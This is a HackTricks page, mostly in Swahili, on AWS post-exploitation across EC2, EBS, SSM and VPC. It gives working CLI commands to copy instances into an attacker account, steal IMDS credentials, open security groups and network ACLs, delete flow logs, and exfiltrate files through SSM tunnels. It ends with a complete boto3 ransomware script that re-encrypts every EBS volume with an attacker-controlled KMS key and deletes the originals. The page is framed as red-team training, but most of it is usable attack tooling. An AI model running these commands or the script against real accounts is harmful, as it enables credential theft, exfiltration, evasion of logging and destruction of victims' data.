AWS - EC2, EBS, SSM & VPC Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

EC2 & VPC

Kwa maelezo zaidi angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Malicious VPC Mirror - `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule`

VPC traffic mirroring duplicates inbound and outbound traffic for EC2 instances within a VPC bila hitaji la kusakinisha chochote kwenye instances hizo wenyewe. Trafiki iliyorudiwa kwa kawaida itatumwa kwa kitu kama network intrusion detection system (IDS) kwa ajili ya uchambuzi na ufuatiliaji. Mshambuliaji anaweza kutumia hili kunasa trafiki yote na kupata taarifa nyeti kutoka kwake:

Kwa maelezo zaidi angalia ukurasa huu:

AWS - Malicious VPC Mirror

Nakili Instance Inayotumika

Instances kawaida huwa zina aina fulani ya taarifa nyeti. Kuna njia mbalimbali za kuingia ndani (angalia EC2 privilege escalation tricks). Hata hivyo, njia nyingine ya kukagua kile kilicho ndani yake ni kuunda AMI na kuendesha instance mpya (hata kwenye account yako mwenyewe) kutoka kwake:

# List instances
aws ec2 describe-images

# create a new image for the instance-id
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# add key to AWS
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# now you can check the instance
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# If needed : edit groups
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1

# be a good guy, clean our instance to avoid any useless cost
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1

EBS Snapshot dump

Snapshots are backups of volumes, ambazo kawaida zinaweza kuwa na taarifa nyeti, kwa hivyo kuzikagua kunapaswa kufichua taarifa hizi.\
Ikiwa utapata a volume without a snapshot unaweza: Create a snapshot na kufanya hatua zifuatazo au tu mount it in an instance ndani ya account:

AWS - EBS Snapshot Dump

Covert Disk Exfiltration via AMI Store-to-S3

Hamisha EC2 AMI moja kwa moja kwa S3 ukitumia CreateStoreImageTask ili kupata raw disk image bila snapshot sharing. Hii inaruhusu forensics kamili offline au data theft huku ikiacha networking ya instance bila kuathirika.

AWS – Covert Disk Exfiltration via AMI Store-to-S3 (CreateStoreImageTask)

Live Data Theft via EBS Multi-Attach

Unganisha io1/io2 Multi-Attach volume kwenye instance ya pili na uii-mount kwa read-only ili kunyonya live data bila snapshots. Inafaa pale volume ya mwathiriwa tayari ikiwa imewezeshwa Multi-Attach ndani ya AZ ile ile.

AWS - Live Data Theft via EBS Multi-Attach

EC2 Instance Connect Endpoint Backdoor

Unda EC2 Instance Connect Endpoint, ruhusu ingress, na ingiza ephemeral SSH keys ili kufikia private instances kupitia managed tunnel. Hii inatoa njia za haraka za lateral movement bila kufungua public ports.

AWS - EC2 Instance Connect Endpoint backdoor + ephemeral SSH key injection

EC2 ENI Secondary Private IP Hijack

Hamisha secondary private IP ya ENI ya mwathiriwa kwenda ENI inayodhibitiwa na attacker ili kuiga hosts zilizoorodheshwa kwa IP. Hii inaruhusu kupita internal ACLs au SG rules zilizobongwa kwa anwani maalum.

AWS – EC2 ENI Secondary Private IP Hijack (Trust/Allowlist Bypass)

Elastic IP Hijack for Ingress/Egress Impersonation

Reassociate Elastic IP kutoka kwa instance ya mwathiriwa kwenda kwa attacker ili kukamata inbound traffic au kuanzisha outbound connections ambazo zinaonekana zinatoka kwa trusted public IPs.

AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation

Security Group Backdoor via Managed Prefix Lists

Ikiwa rule ya security group inarejea customer-managed prefix list, kuongeza attacker CIDRs kwenye listi hiyo kunapanua kwa utulivu ufikivu kwa kila rule ya SG inayotegemea bila kubadilisha SG yenyewe.

AWS - Security Group Backdoor via Managed Prefix Lists

VPC Endpoint Egress Bypass

Unda gateway au interface VPC endpoints ili kupata tena outbound access kutoka subnets zilizotengwa. Kutumia AWS-managed private links kunavuka controls za IGW/NAT zisizokuwepo kwa ajili ya data exfiltration.

AWS – Egress Bypass from Isolated Subnets via VPC Endpoints

`ec2:AuthorizeSecurityGroupIngress`

Mshambuliaji mwenye ruhusa ya ec2:AuthorizeSecurityGroupIngress anaweza kuongeza inbound rules kwenye security groups (kwa mfano, kuruhusu tcp:80 kutoka 0.0.0.0/0), hivyo kufichua huduma za ndani kwa Internet ya umma au kwa mitandao isiyoruhusiwa.

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0

`ec2:ReplaceNetworkAclEntry`

Mdukuzi mwenye ruhusa za ec2:ReplaceNetworkAclEntry (au sawa) anaweza kubadilisha Network ACLs (NACLs) za subnet ili kuzifanya ziwe za kuruhusu sana — kwa mfano kuruhusu 0.0.0.0/0 kwenye ports muhimu — na hivyo kuonyesha safu nzima ya subnet kwa Internet au kwa sehemu za mtandao zisizoidhinishwa. Tofauti na Security Groups, ambazo zinatumika per-instance, NACLs zinatumika kwa ngazi ya subnet, kwa hivyo kubadilisha NACL yenye vizuizi kunaweza kuwa na blast radius kubwa kwa kuwezesha upatikanaji kwa hosts wengi zaidi.

aws ec2 replace-network-acl-entry \
--network-acl-id <ACL_ID> \
--rule-number 100 \
--protocol <PROTOCOL> \
--rule-action allow \
--egress <true|false> \
--cidr-block 0.0.0.0/0

`ec2:Delete*`

Mshambuliaji mwenye ruhusa za ec2:Delete* na iam:Remove* anaweza kufuta rasilimali muhimu za miundombinu na usanidi — kwa mfano key pairs, launch templates/versions, AMIs/snapshots, volumes or attachments, security groups or rules, ENIs/network endpoints, route tables, gateways, or managed endpoints. Hii inaweza kusababisha kukatika kwa huduma mara moja, kupoteza data, na kupoteza ushahidi wa forensics.

Mfano mmoja ni kufuta security group:

aws ec2 delete-security-group
–group-id <SECURITY_GROUP_ID>

VPC Flow Logs Cross-Account Exfiltration

Elekeza VPC Flow Logs kwenye S3 bucket inayodhibitiwa na mshambuliaji ili kukusanya kwa mfululizo metadata ya mtandao (source/destination, ports) nje ya akaunti ya mwathiriwa kwa ajili ya reconnaissance ya muda mrefu.

AWS - VPC Flow Logs Cross-Account Exfiltration to S3

Data Exfiltration

DNS Exfiltration

Hata kama unafunga EC2 ili hakuna trafiki itaondoka, bado inaweza exfil via DNS.

VPC Flow Logs hazitarekodi hili.
Huna ufikiaji wa AWS DNS logs.
Zima hili kwa kuweka “enableDnsSupport” kuwa false kwa kutumia:

aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id <vpc-id>

Exfiltration via API calls

Mshambuliaji anaweza kuita API endpoints za akaunti anazodhibiti. CloudTrail itarekodi miito hii na mshambuliaji ataweza kuona exfiltrate data kwenye CloudTrail logs.

Fungua security group

Unaweza kupata upatikanaji zaidi wa huduma za mtandao kwa kufungua ports kama ifuatavyo:

aws ec2 authorize-security-group-ingress --group-id <sg-id> --protocol tcp --port 80 --cidr 0.0.0.0/0
# Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC

Privesc to ECS

Inawezekana kuendesha EC2 instance na kui-sajili ili itumike kuendesha ECS instances kisha kuiba data za instances za ECS.

For more information check this.

ECS-on-EC2 IMDS Abuse and ECS Agent Impersonation (ECScape)

Katika ECS inayotumia EC2 launch type, control plane inachukua kila task role na kuituma temporary credentials kwa ECS agent kupitia Agent Communication Service (ACS) WebSocket channel. Agent kisha inawahudumia containers ile credentials kupitia task metadata endpoint (169.254.170.2). Utafiti wa ECScape unaonyesha kwamba ikiwa container inaweza kufikia IMDS na kuiba instance profile, inaweza kujifanya kuwa agent kupitia ACS na kupokea every task role credential kwenye host hiyo, ikiwa ni pamoja na task execution role credentials ambazo hazioneshwi kupitia metadata endpoint.

Attack chain

Steal the container instance role from IMDS. Ufikiaji wa IMDS unahitajika kupata host role inayotumika na ECS agent.

TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
http://169.254.169.254/latest/meta-data/iam/security-credentials/{InstanceProfileName}

Discover the ACS poll endpoint and required identifiers. Ukitumia instance role credentials, ita ecs:DiscoverPollEndpoint kupata ACS endpoint na kukusanya vitambulisho kama cluster ARN na container instance ARN. Cluster ARN inaonyeshwa kupitia task metadata (169.254.170.2/v4/), wakati container instance ARN inaweza kupatikana kupitia agent introspection API au (ikiwa inaruhusiwa) ecs:ListContainerInstances.
Impersonate the ECS agent over ACS. Anzisha SigV4-signed WebSocket kwa poll endpoint na jumuisha sendCredentials=true. ECS inakubali muunganisho kama session halali ya agent na inaanza kusambaza IamRoleCredentials messages kwa all tasks kwenye instance. Hii ni pamoja na task execution role credentials, ambazo zinaweza kufungua uwezo wa ECR pulls, Secrets Manager retrievals, au CloudWatch Logs access.

Find the PoC in https://github.com/naorhaziz/ecscape

IMDS reachability with IMDSv2 + hop limit 1

Kuweka IMDSv2 na HttpTokens=required na HttpPutResponseHopLimit=1 kunazuia tu tasks ambazo zinaishi nyuma ya hop ya ziada (Docker bridge). Modes nyingine za networking zinaendelea kuwa umbali wa hop mmoja kutoka kwa Nitro controller na bado zinapata majibu:

ECS network mode	IMDS inafikika?	Sababu
`awsvpc`	✅	Kila task inapata ENI yake mwenyewe ambayo bado iko umbali wa hop mmoja kutoka IMDS, hivyo tokens na majibu ya metadata yanawasili kwa mafanikio.
`host`	✅	Tasks zinashirikiana namespace ya host, hivyo zinaona umbali sawa wa hop kama EC2 instance.
`bridge`	❌	Majibu yanakufa kwenye Docker bridge kwa sababu hop ya ziada inaisha hop limit.

Kwa hivyo, usizumie kwamba hop limit 1 inalinda awsvpc au host-mode workloads—daima jaribu kutoka ndani ya containers zako.

Detecting IMDS blocks per network mode

awsvpc tasks: Security groups, NACLs, au mabadiliko ya routing hayatoweza kuzuia address ya link-local 169.254.169.254 kwa sababu Nitro inaiingiza kwenye host. Angalia /etc/ecs/ecs.config kwa ECS_AWSVPC_BLOCK_IMDS=true. Ikiwa flag haipo (default) unaweza curl IMDS moja kwa moja kutoka kwa task. Ikiwa imewekwa, ingia ndani ya namespace ya host/agent ili kuibadilisha au endesha tooling yako nje ya awsvpc.
bridge mode: Wakati requests za metadata zinashindwa hata kama hop limit 1 imewekwa, watetezi huenda waliweka rule ya DOCKER-USER drop kama --in-interface docker+ --destination 169.254.169.254/32 --jump DROP. Kuingiza iptables -S DOCKER-USER kunaonyesha hilo, na uwezo wa root unakuwezesha kufuta au kuorodhesha tena rule kabla ya kujaribu IMDS.
host mode: Angalia agent configuration kwa ECS_ENABLE_TASK_IAM_ROLE_NETWORK_HOST=false. Setting hiyo inafuta kabisa task IAM roles, hivyo lazima either ui-rudishe, uhame kwenye awsvpc tasks, au upore credentials kwa njia nyingine kwenye host. Wakati value ni true (default), kila process ya host—pamoja na containers zilizoharibiwa—inaweza kufikia IMDS isipokuwa kuna eBPF/cgroup filters maalum zinazolenga 169.254.169.254; angalia programu za tc/eBPF au iptables rules zinazo-refer address hiyo.

Latacora hata walitoa Terraform validation code ambayo unaweza kuiweka kwenye target account kuorodhesha ni network modes gani bado zinaonyesha metadata na kupanga hatua yako inayofuata ipasavyo.

Mara utaelewa ni modes gani zinaonyesha IMDS unaweza kupanga njia yako ya post-exploitation: lenga task yoyote ya ECS, omba instance profile, jifanye agent, na vunja kila task role nyingine kwa kusogea upande au kudumu ndani ya cluster.

Remove VPC flow logs

aws ec2 delete-flow-logs --flow-log-ids <flow_log_ids> --region <region>

SSM Port Forwarding

Ruhusa zinazohitajika:

ssm:StartSession

Mbali na command execution, SSM inaruhusu traffic tunneling ambayo inaweza kutumiwa ku-pivot kutoka kwa EC2 instances ambazo hazina network access kwa sababu ya Security Groups au NACLs. Mojawapo ya matukio ambapo hili ni muhimu ni pivoting kutoka kwa Bastion Host kwenda kwenye private EKS cluster.

Ili kuanza session unahitaji SessionManagerPlugin iwe imewekwa: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Sakinisha SessionManagerPlugin kwenye kompyuta yako
Ingia kwenye Bastion EC2 ukitumia amri ifuatayo:

aws ssm start-session --target "$INSTANCE_ID"

Pata Bastion EC2 AWS temporary credentials kwa kutumia script ya Abusing SSRF in AWS EC2 environment
Hamisha credentials kwenye mashine yako kwenye faili $HOME/.aws/credentials kama [bastion-ec2] profile
Ingia kwenye EKS kama Bastion EC2:

aws eks update-kubeconfig --profile bastion-ec2 --region <EKS-CLUSTER-REGION> --name <EKS-CLUSTER-NAME>

Sasisha uwanja wa server katika faili $HOME/.kube/config ili uelekeze kwa https://localhost
Tengeneza tuneli ya SSM kama ifuatavyo:

sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":["<TARGET-IP-OR-DOMAIN>"],"portNumber":["443"], "localPortNumber":["443"]}' --region <BASTION-INSTANCE-REGION>

Trafiki kutoka kwa zana ya kubectl sasa inapitishwa kupitia tuneli ya SSM kupitia Bastion EC2 na unaweza kufikia private EKS cluster kutoka kwenye mashine yako mwenyewe kwa kuendesha:

kubectl get pods --insecure-skip-tls-verify

Kumbuka kwamba muunganisho wa SSL utakosa isipokuwa ukiteua bendera --insecure-skip-tls-verify (au sawa yake katika zana za ukaguzi za K8s). Kwa kuwa trafiki inapitia kupitia tuneli salama ya AWS SSM, uko salama dhidi ya aina yoyote ya mashambulizi ya MitM.

Mwishowe, mbinu hii si maalum kwa kushambulia klasta za EKS za kibinafsi. Unaweza kuweka domains na ports zozote ili pivot kwa huduma nyingine yoyote ya AWS au custom application.

Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession)

Ikiwa unahitaji tu kupitisha TCP port moja kutoka EC2 instance hadi kompyuta yako ya ndani unaweza kutumia dokumenti ya SSM AWS-StartPortForwardingSession (hakuna remote host parameter inahitajika):

aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8000","localPortNumber"="8000" \
--region <REGION>

The command establishes a bidirectional tunnel between your workstation (localPortNumber) and the selected port (portNumber) on the instance without opening any inbound Security-Group rules.

Matumizi ya kawaida:

File exfiltration

Kwenye instance anzisha HTTP server ya haraka inayoonyesha saraka unayotaka kutoa nje:

python3 -m http.server 8000

Kutoka kwenye workstation yako pakua faili kupitia tunnel ya SSM:

curl http://localhost:8000/loot.txt -o loot.txt

Kufikia web applications za ndani (mf. Nessus)

# Forward remote Nessus port 8834 to local 8835
aws ssm start-session --target i-0123456789abcdef0 \
--document-name AWS-StartPortForwardingSession \
--parameters "portNumber"="8834","localPortNumber"="8835"
# Browse to http://localhost:8835

Kidokezo: Compress and encrypt ushahidi kabla ya exfiltrating ili CloudTrail isiandike clear-text content:

# On the instance
7z a evidence.7z /path/to/files/* -p'Str0ngPass!'

Shiriki AMI

aws ec2 modify-image-attribute --image-id <image_ID> --launch-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

Tafuta taarifa nyeti katika AMIs za umma na za binafsi

https://github.com/saw-your-packet/CloudShovel: CloudShovel ni zana iliyoundwa kutafuta taarifa nyeti ndani ya Amazon Machine Images (AMIs) za umma au binafsi. Inatautomati mchakato wa kuanzisha instances kutoka kwa AMIs lengwa, mounting volumes zao, na kuchunguza kwa ajili ya secrets au data nyeti zinazowezekana.

Shiriki EBS Snapshot

aws ec2 modify-snapshot-attribute --snapshot-id <snapshot_ID> --create-volume-permission "Add=[{UserId=<recipient_account_ID>}]" --region <AWS_region>

EBS Ransomware PoC

Thibitisho la dhana linalofanana na maonyesho ya Ransomware yaliyotajwa katika S3 post-exploitation notes. KMS inapaswa kubadilishwa jina kuwa RMS (Ransomware Management Service) kutokana na urahisi wake wa ku-encrypt huduma mbalimbali za AWS.

Kwanza, kutoka kwa ‘attacker’ AWS account, tengeneza customer managed key katika KMS. Kwa mfano huu tutajiruhusu AWS kusimamia key data yangu, lakini katika hali halisi a malicious actor angehifadhi key data nje ya udhibiti wa AWS. Badilisha key policy ili kuruhusu AWS account Principal yoyote kutumia key. Kwa key policy hii, jina la account lilikuwa ‘AttackSim’ na policy rule inayoruhusu ufikiaji wote inaitwa ‘Outside Encryption’

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Outside Encryption",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey",
"kms:GenerateDataKeyWithoutPlainText",
"kms:CreateGrant"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:CreateGrant",
"kms:ListGrants",
"kms:RevokeGrant"
],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume:

kms:CreateGrant
kms:Decrypt
kms:DescribeKey
kms:GenerateDataKeyWithoutPlainText
kms:ReEncrypt

Now with the publicly accessible key to use. We can use a ‘victim’ account that has some EC2 instances spun up with unencrypted EBS volumes attached. This ‘victim’ account’s EBS volumes are what we’re targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account.

Pasted image 20231231172655 Pasted image 20231231172734

Similar to the S3 ransomware example. This attack will create copies of the attached EBS volumes using snapshots, use the publicly available key from the ‘attacker’ account to encrypt the new EBS volumes, then detach the original EBS volumes from the EC2 instances and delete them, and then finally delete the snapshots used to create the newly encrypted EBS volumes. Pasted image 20231231173130

This results in only encrypted EBS volumes left available in the account.

Pasted image 20231231173338

Also worth noting, the script stopped the EC2 instances to detach and delete the original EBS volumes. The original unencrypted volumes are gone now.

Pasted image 20231231173931

Next, return to the key policy in the ‘attacker’ account and remove the ‘Outside Encryption’ policy rule from the key policy.

{
"Version": "2012-10-17",
"Id": "key-consolepolicy-3",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:root"
},
"Action": "kms:*",
"Resource": "*"
},
{
"Sid": "Allow access for Key Administrators",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Create*",
"kms:Describe*",
"kms:Enable*",
"kms:List*",
"kms:Put*",
"kms:Update*",
"kms:Revoke*",
"kms:Disable*",
"kms:Get*",
"kms:Delete*",
"kms:TagResource",
"kms:UntagResource",
"kms:ScheduleKeyDeletion",
"kms:CancelKeyDeletion"
],
"Resource": "*"
},
{
"Sid": "Allow use of the key",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": [
"kms:Encrypt",
"kms:Decrypt",
"kms:ReEncrypt*",
"kms:GenerateDataKey*",
"kms:DescribeKey"
],
"Resource": "*"
},
{
"Sid": "Allow attachment of persistent resources",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim"
},
"Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"],
"Resource": "*",
"Condition": {
"Bool": {
"kms:GrantIsForAWSResource": "true"
}
}
}
]
}

Subiri kidogo ili sera ya ufunguo iliyowekwa hivi karibuni isambae. Kisha rudi kwenye akaunti ya ‘victim’ na jaribu kuambatisha moja ya volumes za EBS zilizofichwa hivi karibuni. Utagundua kwamba unaweza kuambatisha volume.

Pasted image 20231231174131 Pasted image 20231231174258

Lakini unapo jaribu kuanzisha tena EC2 instance ukiwa umeshikilia volume ya EBS iliyofichwa, itashindwa tu na itarudi kutoka kwenye hali ya ‘pending’ tena hadi hali ya ‘stopped’ kwa sababu volume ya EBS iliyounganishwa haiwezi kufunguliwa kwa kutumia ufunguo kwa kuwa sera ya ufunguo haiviruhusu tena.

Pasted image 20231231174322 Pasted image 20231231174352

Hii ndiyo python script iliyotumika. Inachukua AWS creds za akaunti ya ‘victim’ na thamani ya ARN ya AWS inayopatikana kwa umma kwa ufunguo utakaotumika kwa encryption. Script itafanya nakala zilizosimbwa za ALL available EBS volumes zilizounganishwa na ALL EC2 instances katika akaunti ya AWS iliyolengwa, kisha itasimamisha kila EC2 instance, itatenganisha volumes za EBS za awali, kuzifuta, na mwishowe kufuta snapshots zote zilizotumika wakati wa mchakato. Hii itaacha tu volumes za EBS zilizosimbwa katika akaunti ya ‘victim’ iliyolengwa. TUMIA SCRIPT HII TU KATIKA MILINGO YA MAJARIBU, NI YA KUHARIBU NA ITAFUTA VOLUMES ZOTE ZA AWALI ZA EBS. Unaweza kuzirejesha kwa kutumia KMS key iliyotumika na kuziweka katika hali yao ya awali kupitia snapshots, lakini nataka tu kukufahamisha kuwa mwishowe ni PoC ya ransomware.

import boto3
import argparse
from botocore.exceptions import ClientError

def enumerate_ec2_instances(ec2_client):
instances = ec2_client.describe_instances()
instance_volumes = {}
for reservation in instances['Reservations']:
for instance in reservation['Instances']:
instance_id = instance['InstanceId']
volumes = [vol['Ebs']['VolumeId'] for vol in instance['BlockDeviceMappings'] if 'Ebs' in vol]
instance_volumes[instance_id] = volumes
return instance_volumes

def snapshot_volumes(ec2_client, volumes):
snapshot_ids = []
for volume_id in volumes:
snapshot = ec2_client.create_snapshot(VolumeId=volume_id)
snapshot_ids.append(snapshot['SnapshotId'])
return snapshot_ids

def wait_for_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
ec2_client.get_waiter('snapshot_completed').wait(SnapshotIds=[snapshot_id])

def create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn):
new_volume_ids = []
for snapshot_id in snapshot_ids:
snapshot_info = ec2_client.describe_snapshots(SnapshotIds=[snapshot_id])['Snapshots'][0]
volume_id = snapshot_info['VolumeId']
volume_info = ec2_client.describe_volumes(VolumeIds=[volume_id])['Volumes'][0]
availability_zone = volume_info['AvailabilityZone']

volume = ec2_client.create_volume(SnapshotId=snapshot_id, AvailabilityZone=availability_zone,
Encrypted=True, KmsKeyId=kms_key_arn)
new_volume_ids.append(volume['VolumeId'])
return new_volume_ids

def stop_instances(ec2_client, instance_ids):
for instance_id in instance_ids:
try:
instance_description = ec2_client.describe_instances(InstanceIds=[instance_id])
instance_state = instance_description['Reservations'][0]['Instances'][0]['State']['Name']

if instance_state == 'running':
ec2_client.stop_instances(InstanceIds=[instance_id])
print(f"Stopping instance: {instance_id}")
ec2_client.get_waiter('instance_stopped').wait(InstanceIds=[instance_id])
print(f"Instance {instance_id} stopped.")
else:
print(f"Instance {instance_id} is not in a state that allows it to be stopped (current state: {instance_state}).")

except ClientError as e:
print(f"Error stopping instance {instance_id}: {e}")

def detach_and_delete_volumes(ec2_client, volumes):
for volume_id in volumes:
try:
ec2_client.detach_volume(VolumeId=volume_id)
ec2_client.get_waiter('volume_available').wait(VolumeIds=[volume_id])
ec2_client.delete_volume(VolumeId=volume_id)
print(f"Deleted volume: {volume_id}")
except ClientError as e:
print(f"Error detaching or deleting volume {volume_id}: {e}")


def delete_snapshots(ec2_client, snapshot_ids):
for snapshot_id in snapshot_ids:
try:
ec2_client.delete_snapshot(SnapshotId=snapshot_id)
print(f"Deleted snapshot: {snapshot_id}")
except ClientError as e:
print(f"Error deleting snapshot {snapshot_id}: {e}")

def replace_volumes(ec2_client, instance_volumes):
instance_ids = list(instance_volumes.keys())
stop_instances(ec2_client, instance_ids)

all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
detach_and_delete_volumes(ec2_client, all_volumes)

def ebs_lock(access_key, secret_key, region, kms_key_arn):
ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, kms_key_arn)  # New encrypted volumes are created but not attached
replace_volumes(ec2_client, instance_volumes)  # Stops instances, detaches and deletes old volumes
delete_snapshots(ec2_client, snapshot_ids)  # Optionally delete snapshots if no longer needed

def parse_arguments():
parser = argparse.ArgumentParser(description='EBS Volume Encryption and Replacement Tool')
parser.add_argument('--access-key', required=True, help='AWS Access Key ID')
parser.add_argument('--secret-key', required=True, help='AWS Secret Access Key')
parser.add_argument('--region', required=True, help='AWS Region')
parser.add_argument('--kms-key-arn', required=True, help='KMS Key ARN for EBS volume encryption')
return parser.parse_args()

def main():
args = parse_arguments()
ec2_client = boto3.client('ec2', aws_access_key_id=args.access_key, aws_secret_access_key=args.secret_key, region_name=args.region)

instance_volumes = enumerate_ec2_instances(ec2_client)
all_volumes = [vol for vols in instance_volumes.values() for vol in vols]
snapshot_ids = snapshot_volumes(ec2_client, all_volumes)
wait_for_snapshots(ec2_client, snapshot_ids)
create_encrypted_volumes(ec2_client, snapshot_ids, args.kms_key_arn)
replace_volumes(ec2_client, instance_volumes)
delete_snapshots(ec2_client, snapshot_ids)

if __name__ == "__main__":
main()

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.